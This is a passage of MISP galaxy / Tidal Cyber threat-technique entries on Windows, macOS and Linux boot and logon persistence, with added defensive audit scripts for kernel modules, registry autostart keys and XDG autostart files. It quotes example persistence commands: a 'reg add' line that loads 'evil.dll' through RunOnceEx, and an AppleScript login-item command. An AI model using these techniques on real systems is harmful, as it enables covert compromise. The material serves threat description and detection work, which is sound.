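On a live host the same checks run against `reg export` output of the two keys; comparing the result with a baseline export from a freshly built machine is more reliable than any allowlist, since vendors do add legitimate Active Setup components and LSA packages.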

The tag is: misp-galaxy:technique="Authentication Package"

Kernel Modules and Extensions

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> 

When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that runs with the highest operating system privilege (Ring 0).<sup>[[Linux Kernel Module Programming Guide](https://app.tidalcyber.com/references/ceefe610-0b26-4307-806b-17313d570511)]</sup> Common features of LKM based rootkits include: hiding themselves, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.<sup>[[iDefense Rootkit Overview](https://app.tidalcyber.com/references/c1aef861-9e31-42e6-a2eb-5151b056762b)]</sup>
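
Three of the properties above are checkable from the module list alone: a rootkit LKM is almost always out-of-tree and unsigned (which the kernel records as taint flags), it will not appear in a baseline taken from a known-good host, and one that "hides itself" by unlinking from the module list drops out of `/proc/modules` while its sysfs directory remains. The following is an added example, not code from the MISP galaxy entry or from any of the projects it cites; the `/proc/modules` text, the sysfs name list and the baseline are constructed, and the method of collecting sysfs names (directories under `/sys/module` that contain an `initstate` file, which only loadable modules have) is stated as an assumption in the code.

```python
"""Added example (not from the MISP galaxy entry): audit loaded Linux kernel
modules for taint, deviation from a baseline, and self-hiding.

Inputs are constructed: text in /proc/modules format, the names under
/sys/module that carry an 'initstate' file (assumption: loadable modules have
one, built-in ones do not), and a baseline set taken from a trusted host.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Module:
    name: str
    size: int
    refcount: int
    deps: tuple
    state: str
    taint: str           # kernel taint letters, e.g. "OE"; empty if untainted


# Meaning of the taint letters shown in parentheses at the end of a line.
TAINT_MEANING = {"O": "out-of-tree", "E": "unsigned", "P": "proprietary", "C": "staging"}


def parse_proc_modules(text: str) -> list:
    """Parse /proc/modules lines: name size refcount deps state offset [taint]."""
    mods = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        name, size, refs, deps, state = parts[:5]
        taint = parts[6].strip("()") if len(parts) > 6 else ""
        dep_names = tuple(d for d in deps.split(",") if d and d != "-")
        mods.append(Module(name, int(size), int(refs), dep_names, state, taint))
    return mods


def audit_modules(proc_text: str, sys_module_names, baseline) -> list:
    """Return (module, reason) findings."""
    listed = parse_proc_modules(proc_text)
    findings = []
    for m in listed:
        if m.taint:
            meaning = ", ".join(TAINT_MEANING.get(c, c) for c in m.taint)
            findings.append((m.name, f"tainted module ({meaning})"))
        if m.name not in baseline:
            findings.append((m.name, "not in baseline"))
    # A module that unlinks itself from the module list disappears from
    # /proc/modules (and lsmod), but its /sys/module entry usually remains.
    visible = {m.name for m in listed}
    for name in sorted(set(sys_module_names) - visible):
        findings.append((name, "in /sys/module but missing from /proc/modules"))
    return findings


# Constructed sample data; 'shadow_mod' stands in for a hidden module.
SAMPLE_PROC_MODULES = """\
nft_compat 20480 0 - Live 0xffffffffc0a10000
nf_tables 278528 3 nft_compat, Live 0xffffffffc0a20000
ext4 1032192 2 - Live 0xffffffffc0a80000
vboxdrv 610304 0 - Live 0xffffffffc0c00000 (OE)
"""
SAMPLE_SYS_MODULES = ["ext4", "nf_tables", "nft_compat", "vboxdrv", "shadow_mod"]
BASELINE = {"ext4", "nf_tables", "nft_compat"}

if __name__ == "__main__":
    for name, why in audit_modules(SAMPLE_PROC_MODULES, SAMPLE_SYS_MODULES, BASELINE):
        print(f"{name}: {why}")
```

Taint alone is not proof of anything (out-of-tree drivers such as virtualization or GPU modules are routinely tainted), which is why the baseline comparison is run alongside it; the sysfs cross-check is the one that speaks directly to the hiding behaviour the entry describes, and it should be taken from a trusted medium when a compromise is suspected, since a rootkit that hooks filesystem calls can also lie about `/sys`.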

Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as part of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.<sup>[[System and kernel extensions in macOS](https://app.tidalcyber.com/references/e5c4974d-dfd4-4c1c-ba4c-b6fb276effac)]</sup>

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.<sup>[[Apple Kernel Extension Deprecation](https://app.tidalcyber.com/references/86053c5a-f2dd-4eb3-9dc2-6a6a4e1c2ae5)]</sup>

Adversaries can use LKMs and kexts to conduct [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) and/or [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.<sup>[[Volatility Phalanx2](https://app.tidalcyber.com/references/6149f9ed-9218-489b-b87c-8208de89be68)]</sup><sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup><sup>[[GitHub Reptile](https://app.tidalcyber.com/references/6e8cc88a-fb3f-4464-9380-868f597def6e)]</sup><sup>[[GitHub Diamorphine](https://app.tidalcyber.com/references/92993055-d2e6-46b2-92a3-ad70b62e4cc0)]</sup><sup>[[RSAC 2015 San Francisco Patrick Wardle](https://app.tidalcyber.com/references/7e3f3dda-c407-4b06-a6b0-8b72c4dad6e6)]</sup><sup>[[Synack Secure Kernel Extension Broken](https://app.tidalcyber.com/references/647f6be8-fe95-4045-8778-f7d7ff00c96c)]</sup><sup>[[Securelist Ventir](https://app.tidalcyber.com/references/5e4e82c0-16b6-43bc-a70d-6b8d55aaef52)]</sup><sup>[[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]</sup>

The tag is: misp-galaxy:technique="Kernel Modules and Extensions"

Login Items

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.<sup>[[Open Login Items Apple](https://app.tidalcyber.com/references/46a480eb-52d1-44c9-8b44-7e516b27cf82)]</sup> Login items can be added via a shared file list or Service Management Framework.<sup>[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)]</sup> Shared file list login items can be set using scripting languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.<sup>[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)]</sup><sup>[[SMLoginItemSetEnabled Schroeder 2013](https://app.tidalcyber.com/references/ad14bad2-95c8-49b0-9777-e464fc8359a0)]</sup> Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.<sup>[[Launch Services Apple Developer](https://app.tidalcyber.com/references/9973ceb1-2fee-451b-a512-c544671ee9fd)]</sup> Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to create a login item to spawn malicious executables.<sup>[[ELC Running at startup](https://app.tidalcyber.com/references/11ee6303-5103-4063-a765-659ead217c6c)]</sup> Prior to macOS 10.5, adversaries can add login items by using [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to send Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.<sup>[[Login Items AE](https://app.tidalcyber.com/references/d15943dd-d11c-4af2-a3ac-9ebe168a7526)]</sup> Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.<sup>[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)]</sup><sup>[[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)]</sup><sup>[[Add List Remove Login Items Apple Script](https://app.tidalcyber.com/references/13773d75-6fc1-4289-bf45-6ee147279052)]</sup> This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.<sup>[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)]</sup> Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.<sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup><sup>[[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]</sup><sup>[[objsee netwire backdoor 2019](https://app.tidalcyber.com/references/866c5305-8629-4f09-8dfe-192c8573ffb0)]</sup>

The tag is: misp-galaxy:technique="Login Items"

LSASS Driver

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.<sup>[[Microsoft Security Subsystem](https://app.tidalcyber.com/references/27dae010-e3b3-4080-8039-9f89a29607e6)]</sup>

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68)), an adversary can use LSA operations to continuously execute malicious payloads.

The tag is: misp-galaxy:technique="LSASS Driver"

Port Monitors

Adversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.<sup>[[AddMonitor](https://app.tidalcyber.com/references/8c1a719e-6ca1-4b41-966d-ddb87c849fe0)]</sup> This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.<sup>[[Bloxham](https://app.tidalcyber.com/references/b212d16f-5347-49ab-8339-432b4fd1ef50)]</sup> Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port

  • Standard TCP/IP Port

  • USB Monitor

  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:technique="Port Monitors"

Print Processors

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.<sup>[[Microsoft Intro Print Processors](https://app.tidalcyber.com/references/ba04b0d0-1c39-5f48-824c-110ee7affbf3)]</sup>

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, which can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.<sup>[[Microsoft AddPrintProcessor May 2018](https://app.tidalcyber.com/references/12c7160b-c93c-44cd-b108-68d4823aec8c)]</sup> After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.<sup>[[ESET PipeMon May 2020](https://app.tidalcyber.com/references/cbc09411-be18-4241-be69-b718a741ed8c)]</sup>

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

The tag is: misp-galaxy:technique="Print Processors"

Registry Run Keys / Startup Folder

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup> These programs will be executed under the context of the user and will have the account’s associated permissions level.

The following run keys are created by default on Windows systems:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives.<sup>[[Microsoft Wow6432Node 2018](https://app.tidalcyber.com/references/cbc14af8-f0d9-46c9-ae2c-d93d706ac84e)]</sup><sup>[[Malwarebytes Wow6432Node 2016](https://app.tidalcyber.com/references/d4eba34c-d76b-45b4-bcaf-0f13459daaad)]</sup> The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup> For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code><sup>[[Oddvar Moe RunOnceEx Mar 2018](https://app.tidalcyber.com/references/36d52213-8d9f-4642-892b-40460d5631d7)]</sup>

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the <code>load</code> value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:technique="Registry Run Keys / Startup Folder"

Re-opened Applications

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".<sup>[[Re-Open windows on Mac](https://app.tidalcyber.com/references/ed907f1e-71d6-45db-8ef3-75bec59c238b)]</sup> When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup><sup>[[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]</sup> Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.

The tag is: misp-galaxy:technique="Re-opened Applications"

Security Support Provider

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.<sup>[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]</sup>

The tag is: misp-galaxy:technique="Security Support Provider"

Shortcut Modification

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.<sup>[[Shortcut for Persistence](https://app.tidalcyber.com/references/4a12e927-0511-40b1-85f3-869ffc452c2e)]</sup> Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://app.tidalcyber.com/technique/040804f6-6a87-4011-8716-66682bc16ed4)) to persistently launch malware.

The tag is: misp-galaxy:technique="Shortcut Modification"

Time Providers

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.<sup>[[Microsoft W32Time Feb 2018](https://app.tidalcyber.com/references/991f7a9f-4317-42fa-bc9b-f533fe36b517)]</sup> W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup>

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup> The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup>

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in the context of the Local Service account.<sup>[[Github W32Time Oct 2017](https://app.tidalcyber.com/references/a248fd87-c3c1-4de7-a9af-0436a10f71aa)]</sup>

The tag is: misp-galaxy:technique="Time Providers"

Winlogon Helper DLL

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\Wow6432Node]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon.<sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup>

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys are known to be susceptible to abuse:<sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup>

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events

  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on

  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.
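The Registry locations named in the Port Monitors, Registry Run Keys / Startup Folder and Winlogon Helper DLL entries above are all plain values that an analyst can pull from a host with <code>reg export</code> and review offline. The following audit script is an added example written for this document, not code from the MISP galaxy or from ATT&CK. It parses the text format that <code>reg export</code> produces, lists every autostart entry under the Run, RunOnce and RunOnceEx keys, checks the Winlogon <code>Shell</code> and <code>Userinit</code> values against their documented defaults (<code>explorer.exe</code> and a single <code>userinit.exe</code> entry), and reports any subkey under <code>Print\Monitors</code> that is not one of the four default monitors listed above. The export text is constructed sample data, and the trusted-directory heuristic (images under <code>C:\Windows</code> or <code>C:\Program Files</code>) is an assumption for illustration rather than a rule from the source:

```python
"""Audit a Windows Registry export (.reg text) for boot/logon autostart entries.

Added example, not part of the MISP galaxy or ATT&CK. SAMPLE_REG is constructed
data; TRUSTED_PREFIXES and the Winlogon defaults are assumptions for the example.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample of what `reg export` writes (backslashes are escaped as \\).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\Users\\Public\\svc.exe -silent"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="\"C:\\Program Files\\Vendor\\cleanup.exe\" /once"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend]
"1"="C:\\temp\\evil.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\helper.exe,"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port]
"Driver"="localspl.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Legacy Monitor]
"Driver"="C:\\ProgramData\\legacy\\lmon.dll"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
AUTORUN_RE = re.compile(r'\\CurrentVersion\\(Run|RunOnce|RunOnceEx(\\.*)?)$', re.IGNORECASE)
WINLOGON_RE = re.compile(r'\\Windows NT\\CurrentVersion\\Winlogon$', re.IGNORECASE)
MONITOR_RE = re.compile(r'\\Control\\Print\\Monitors\\([^\\]+)$', re.IGNORECASE)

ENV = {"%windir%": "C:\\Windows", "%systemroot%": "C:\\Windows", "%programfiles%": "C:\\Program Files"}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")  # assumption
DEFAULT_MONITORS = {"local port", "standard tcp/ip port", "usb monitor", "wsd port"}  # from the text

Finding = Tuple[str, str, str, str]  # (key, value name, value data, reason)


def unescape(s: str) -> str:
    """Undo the .reg string escaping (\\" and \\\\)."""
    return s.replace('\\"', '"').replace('\\\\', '\\')


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key path: {value name: string data}} for REG_SZ values in a .reg export."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][unescape(m.group(1))] = unescape(m.group(2))
    return keys


def image_path(command: str) -> str:
    """Extract the executable from a command line and expand common environment variables."""
    cmd = command.strip()
    path = cmd[1:cmd.find('"', 1)] if cmd.startswith('"') else cmd.split(" ")[0]
    for var, val in ENV.items():
        path = re.sub(re.escape(var), lambda _: val, path, flags=re.IGNORECASE)
    return path


def audit(keys: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Flag autostart entries a responder would triage first."""
    findings: List[Finding] = []
    for key, values in keys.items():
        if AUTORUN_RE.search(key):
            for name, cmd in values.items():
                if "RunOnceEx" in key and key.endswith("Depend"):
                    findings.append((key, name, cmd, "DLL loaded through a RunOnceEx Depend key"))
                elif not image_path(cmd).lower().startswith(TRUSTED_PREFIXES):
                    findings.append((key, name, cmd, "autostart image outside Windows/Program Files"))
        elif WINLOGON_RE.search(key):
            shell = values.get("Shell", "")
            if shell.strip().lower() != "explorer.exe":
                findings.append((key, "Shell", shell, "Winlogon Shell is not explorer.exe"))
            userinit = [p for p in values.get("Userinit", "").split(",") if p.strip()]
            if len(userinit) != 1 or not userinit[0].lower().endswith("\\userinit.exe"):
                findings.append((key, "Userinit", values.get("Userinit", ""), "Winlogon Userinit has extra entries"))
        else:
            m = MONITOR_RE.search(key)
            if m and m.group(1).lower() not in DEFAULT_MONITORS:
                findings.append((key, "Driver", values.get("Driver", ""), "non-default port monitor registered"))
    return findings


if __name__ == "__main__":
    for key, name, data, reason in audit(parse_reg(SAMPLE_REG)):
        print(f"{reason}\n  {key}\n  {name} = {data}")
```

On the constructed export the script reports the <code>Updater</code> value (image under a user-writable directory), the RunOnceEx <code>Depend</code> DLL, the second <code>Userinit</code> entry and the extra port monitor, while the <code>SecurityHealth</code> and <code>Cleanup</code> entries pass. On a real export the same parser also sees the <code>Policies\Explorer\Run</code>, <code>RunServices</code> and <code>BootExecute</code> locations listed above; adding their key patterns is a one-line change each.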

The tag is: misp-galaxy:technique="Winlogon Helper DLL"

XDG Autostart Entries

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (.desktop) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.<sup>[[Free Desktop Application Autostart Feb 2006](https://app.tidalcyber.com/references/0885434e-3908-4425-9597-ce6abe531ca5)]</sup><sup>[[Free Desktop Entry Keys](https://app.tidalcyber.com/references/4ffb9866-1cf4-46d1-b7e5-d75bd98de018)]</sup>

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the Exec directive in the .desktop configuration file. When the user’s desktop environment is loaded at user login, the .desktop files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the /etc/xdg/autostart directory while the user entries are located in the ~/.config/autostart directory.

Adversaries may combine this technique with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to blend malicious Autostart entries with legitimate programs.<sup>[[Red Canary Netwire Linux 2022](https://app.tidalcyber.com/references/6d4c6c52-38ae-52f5-b438-edeceed446a5)]</sup>
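Because the Autostart mechanism is driven entirely by <code>.desktop</code> files in the two directories named above, a responder can collect those files and triage them offline. The script below is an added example written for this document, not code from the MISP galaxy, ATT&CK or freedesktop.org. It parses each entry, extracts the program behind the <code>Exec</code> directive (dropping <code>%f</code>/<code>%u</code> field codes and unwrapping a <code>sh -c</code> command), honours <code>Hidden=true</code> (which the Desktop Entry specification treats as a deleted entry that is not started), and notes when <code>NoDisplay=true</code> keeps an entry out of menu-style listings. The file contents are constructed samples, and <code>TRUSTED_DIRS</code> is an assumed allowlist of package-managed locations:

```python
"""Triage XDG Autostart entries from .desktop files.

Added example, not part of the MISP galaxy or ATT&CK. SAMPLE_FILES is constructed
data keyed by the path each file would have; TRUSTED_DIRS is an assumption.
"""
import configparser
import os
import shlex
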